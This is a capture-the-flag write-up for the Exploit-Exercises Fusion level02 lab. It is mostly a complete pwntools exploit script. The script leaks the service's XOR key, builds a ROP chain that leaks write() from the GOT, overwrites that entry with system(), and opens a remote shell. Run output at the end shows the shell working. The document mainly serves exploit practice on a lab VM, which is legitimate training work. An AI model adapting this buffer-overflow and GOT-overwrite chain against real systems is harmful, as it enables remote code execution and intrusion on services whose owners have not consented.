Fusion Level02
- The service XOR-encrypts input with a random table, so the first step is recovering that XOR table.
- After that it is just ROP: leak the address of write() and derive the address of system() from the known libc offset.
- I just use system(); execve() is another way to get a shell.
- Using execve() would be cleaner and more convenient when building the payload.
from pwn import *

# Exploit-Exercises Fusion level02 write-up script (Python 2: `print` statement,
# str is bytes). Flow: recover the service's XOR table, submit a ROP chain that
# leaks the GOT entry of write(), then patch that entry so write@plt resolves
# to system(). Every address below is specific to the level02 binary and the
# libc on the lab VM; nothing here is derived at runtime except `system`.
#
# Educational note on mitigations: this chain only works because the binary
# is not PIE (PLT/gadget addresses are fixed), the GOT is writable (no full
# RELRO), and no stack canary aborts the process before the overwritten
# return address is used.

def send_data(payload):
    # Frame one message for the service: 'E' tag, 4-byte little-endian
    # length, then the body.
    # NOTE(review): framing is inferred from usage here — confirm against
    # the level02 service source.
    s.send("E" + p32(len(payload)) + payload)

def leak_xor_table():
    # Send 128 zero bytes: x ^ 0 == x, so if the service XORs input with its
    # table and echoes it back, the last 128 bytes of the reply are the raw
    # table. The first recv() discards whatever precedes that echo.
    # NOTE(review): assumes the echo fits the two 1024-byte reads — confirm.
    send_data("\x00"*128)
    s.recv(1024)
    return s.recv(1024)[-128:]

def encrypt(payload, table):
    # XOR `payload` with the 128-byte `table`, repeating the table every
    # 128 bytes (i % 128). Pre-encrypting the chain means it lands in memory
    # as the intended bytes once the service applies its own XOR.
    # Quadratic str concatenation; acceptable for a one-shot script.
    enc = ""
    for i in range(len(payload)):
        enc += chr(ord(table[i%128])^ord(payload[i]))
    return enc

cmd = "/bin/sh\x00"          # argument for system(); 8 bytes incl. NUL, stored at bss
pppr = 0x80499bd             # gadget used after each 3-argument call to discard its args (name suggests pop;pop;pop;ret)
bss = 0x804b420 + 4          # writable scratch location that receives cmd (name suggests .bss)
read_plt = 0x8048860         # read@plt
write_plt = 0x80489c0        # write@plt
write_got = 0x804b3dc        # GOT slot of write(): leaked, then overwritten
write_system = 0x847a0       # write() - system() distance in the VM's libc (see `system = write - write_system`)

s = remote('192.168.56.136', 20002)   # lab VM address from the write-up
s.recv(1024)                           # discard initial server output
table = leak_xor_table()

# ROP chain. The padding is the distance from the overflowed buffer to the
# saved return address.
# NOTE(review): 0x20000 + 0x10 is taken from the original write-up, not
# derived in this script — confirm against the binary.
payload = "A"*(0x20000 + 0x10)
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(bss)
payload += p32(len(cmd))  # read(0, &bss, 8): store cmd ("/bin/sh") at bss
payload += p32(write_plt)
payload += p32(pppr)
payload += p32(1)
payload += p32(write_got)
payload += p32(4)  # write(1, write_got, 4): leak the resolved address of write()
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(write_got)
payload += p32(4)  # read(0, write_got, 4): replace the GOT entry with system()
payload += p32(write_plt)
payload += "AAAA"         # return-address slot after the call; never reached
payload += p32(bss)       # write(bss) -> now system(bss)
# system("/bin/sh")

payload = encrypt(payload, table)
send_data(payload)
s.recv(1024)
# Drain the echoed buffer so the connection is in a clean state before
# triggering the return (assumes the service echoes the whole payload back).
recv = 0
while recv < len(payload):
    recv += len(s.recv(65536))

s.send("Q")   # NOTE(review): presumably the quit command that makes the service return into the chain — confirm
s.send(cmd)   # consumed by the chain's first read(0, bss, 8)

write = u32(s.recv(4))    # the 4 bytes emitted by write(1, write_got, 4)
print "[+] Write : %s" % hex(write)

system = write - write_system   # offset arithmetic; only valid for this VM's libc build
print "[+] System : %s" % hex(system)

s.send(p32(system))       # consumed by read(0, write_got, 4): GOT slot now points at system()
s.interactive()
zero@ubuntu:~/Desktop$ python fusion.py
[+] Opening connection to 192.168.56.136 on port 20002: Done
[+] Write : 0xb77202c0
[+] System : 0xb769bb20
[*] Switching to interactive mode
$ id
uid=20002 gid=20002 groups=20002